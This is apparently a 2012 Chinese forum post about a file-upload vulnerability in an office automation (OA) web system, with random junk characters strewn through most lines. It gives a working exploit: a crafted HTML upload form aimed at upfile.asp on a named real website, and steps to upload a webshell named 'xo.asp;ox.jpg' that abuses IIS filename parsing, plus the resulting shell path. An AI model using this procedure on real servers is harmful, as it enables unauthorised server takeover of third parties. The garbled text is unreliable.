全能OA办公系统 上传漏洞
4 S0 r& Z: m4 O* E5 W
( q9 |0 o. L! {0 |& M系统介绍:
; |8 U, d- T0 z, ^' K# i
" N& J1 V0 K: x$ b全能OA办公系统2012是功能非常强大的OA系统,目前功能已完全能满足日常办公需要。7 d0 X4 g i4 `% ^6 H$ g1 v2 S
. U, I$ A! ?6 M6 n# ~
主要功能:; I0 F: Q# S* p+ P( R5 B" d1 a
公司通告
; h9 N9 Z) d' L7 E6 t4 z( S' e工作计划 0 j. R/ [3 ]1 o5 }9 W) t
通讯助理
/ f: Z9 V; P! X! E0 I( Z客户资源
5 I$ L' d2 ^5 v& W- G9 E我的公文 ' A" u6 S) l! k& i8 n% @& `6 q
公文传阅 ( t$ u' I' v0 c+ {! ^2 U% [. @
公共资源
/ |& Z6 w& M7 a9 ]8 ^: e资源预约
9 x2 I9 l5 r! h( k$ P* \( ^ U% F今日考勤
$ u; D# @( o6 i, ? F- ^5 z个人计划
# g' U& `2 \% f个人通讯录
6 _; l3 K0 \% L9 W$ t4 z5 W8 R个人基本档案
. N2 }9 m* z. e: n3 p未读邮件
, X z. x2 `; ]) x, q5 _发邮件
/ @" Q! a; q. V! s收件夹 ; C; G" g _" q8 }
寄件夹 $ I$ C, |, {4 \
网络硬盘
% k% u8 ?# P; K网络会议
4 V1 c1 Y9 \: q" }9 s% p) r网络调查 ) y! n5 u; Y* L+ Z9 z$ q
交流论坛. i) m5 ?, G7 t2 w
5 v3 M" E& S0 h: z9 y: e& q% r+ B1 I
有兴趣测试的朋友可以下源码看看
4 C% G9 _% g9 j
8 ?+ C1 P8 }2 u0 q源码下载:4 N d3 V9 F: x' K$ B
& I5 [0 H2 n0 Q6 f2 K& z
http://www.mycodes.net/30/4750.htm, c. f% m4 Z6 [/ a
% V( f! J6 [4 O, w: s漏洞介绍:3 T' k ?+ Z! u0 U
3 |3 A$ e0 `" C6 H2 I; n由upfile.asp上传文件漏洞引起
' t( Z) U) U$ J& g+ O/ K! c! u- y$ j) a2 |0 g( m9 y. z4 i8 I
测试方法:4 x% l8 ~! u$ y- L1 i
8 F. Y. I3 O# ` g# P& @" `) }, x使用名小子上传http://www.itlynn.com/upfile.asp即可
/ N3 Z4 |1 _( w7 s( d5 Z, \$ K) M$ y6 `9 P R
如果upfile.asp文件被删除不存在。
' r. N, k5 K* O4 l N3 k& c0 N
$ K3 L: C" `6 l+ a 那么可以试着访问http://www.itlynn.com/upfile/upfile.asp 。$ ?4 z1 t5 D( N, ^% d: k
g+ e! t8 R- W ^" P
如果存在那么将如下代码保存为upfile.html。9 X( S0 t- b8 f5 `7 [) @2 Y
+ [/ u, I( ]1 e9 o4 a然后将action的参数修改为目标站点的url。例如 http://www.itlynn.com/upfile/upfile.asp。2 ], ]" `# |& K- x: K
5 y' r) u0 d7 |, c 8 D+ v6 m% J1 ` V5 N
% \/ O! u; i6 j) M, ]/ T C8 N01 <table border='0' align="center" cellpadding="5">
- a6 C7 k! M7 h: y9 P
$ ^! s5 D# W8 D2 i02 <form method="POST"action="http://www.itlynn.com/upfile/upfile.asp"enctype="multipart/form-data"id="form1"name="form1">
; `9 v, {3 H# z+ k/ @
D9 ~: a' _, o i03 <tr>
' M: J3 _( I2 D, {- R& C
4 Q+ f& H3 r! Y* j* m9 D04 <td>报错:</td>
6 D* b5 }/ a' p. U
0 d. X0 V/ n0 O, H5 n, _05 <td><input type='radio' name='errnumber' value='0'>
: y9 ^. V8 T& ^0 u% A, U4 |3 g( q6 L% u6 W2 E
06 自动更名 8 I$ |2 `9 p$ r/ R R
/ l _+ s* p: Z: h7 a0 j07 <input type='radio' name='errnumber' value='1' checked>
' v/ z" O9 x# U$ y+ r, ~, y$ Y. ~# X8 c5 P" A* [' O! d2 M. T
08 报错方式
6 Z8 P1 J2 m- g2 y' c2 _. v- l, d0 w* |6 D/ {1 f4 c
09 <input type='radio' name='errnumber' value='2'> 0 m8 B8 M! i- p6 Q `
0 ~8 q& C) n' o. Z' I10 直接覆盖</td> 2 t6 U( y7 P% \# F g$ h
4 m7 W0 k& O0 H3 t* i5 @7 L11 </tr>
+ P) }% ? w4 F$ S+ c) X7 F! K2 K$ y
12 <tr>
4 J% z, p" Q; i6 x' ?2 p: N9 {' O* s& |- ~* |* B$ [& k8 ~7 G3 ]
13 <td>主题:</td>
* M4 Y" U- u" t% D3 B5 o1 q0 V& W5 f) i1 n
14 <td><input type='text' name='filename' size='30'></td> 3 `6 M2 v7 a" n6 Y
' U* w8 Z) F6 u8 U( U M9 y15 </tr> 9 y& G4 x/ p* U& d) B5 n1 j
2 @+ j4 i; z: ?4 X7 y
16 <tr> ; s! |; l) U$ D0 U6 {
$ m9 i5 N6 L- l" R0 Q* C* i( L
17 <td>文件:</td> , N: X0 i$ t6 Y) l# N
' t& v" t& J1 N18 <td><input type="file"name="fruit"size="30"></td> 3 T0 u: A9 [+ e$ _& |
, ~' B1 a) Z- M/ s6 Y9 f' s7 D
19 </tr>
. o5 T. h. V. c5 O4 @
6 `3 V7 e$ j2 H+ f- b, M9 H v20 <tr>
. k( e( p2 I! {: g' y$ Q8 f4 Y8 f( y' a+ q* v- \. T
21 <td valign='top'>简介:</td>
; H+ v$ \' a7 z, O) u3 y& a* e* n: ~! c
22 <td><textarea name='fileExt' cols='40' rows='5'></textarea></td>
7 w; i9 J- Y- E$ |0 N0 C( c3 |# I' ^9 |* c* n, K
23 </tr>
l$ X% m- e6 q3 Z8 U& ]
9 ^' ]1 p. V) }& ]24 8 N! K! E$ A- h
# Y* q& \& }; g0 x; O8 e25 <td colspan='2'><input type="submit" value="上传文件" name="subbutt"></td> 8 E q+ Z2 E3 w! q+ Y
/ ]0 K( x0 R; _' ~0 D26 </tr>
, p0 V1 l2 t+ m. s2 v" V1 V& G" s+ ?( x% M, F3 ^% Q5 z- G
27 </form>
6 j+ f2 p5 n% e1 Y, Q0 ~) D4 Q
K/ O. g: ~% D然后打开上传一个文件名为xo.asp;ox.jpg的文件。7 I4 |" U! D6 Q( c+ Z* o
2 i5 {, k$ n+ z, B * R3 l% ^5 G8 e; Z6 ]' C1 f, {
& {7 |7 h1 G4 d. }0 u$ N0 V t
上传成功后,马的路径是:http://www.itlynn.com/upfile/savepath/xo.asp;ox.jpg/ N) o/ a/ g2 @. p4 x* v1 C( O
5 d' D/ E- G' d1 i; S! l! R3 u
此漏洞需要配合解析漏洞利用。8 V1 H. Q2 B1 r, Q" v
& G- ?4 v1 I1 @* p! ~6 c
|
发表于 2012-11-21 13:45:12
收藏
支持
反对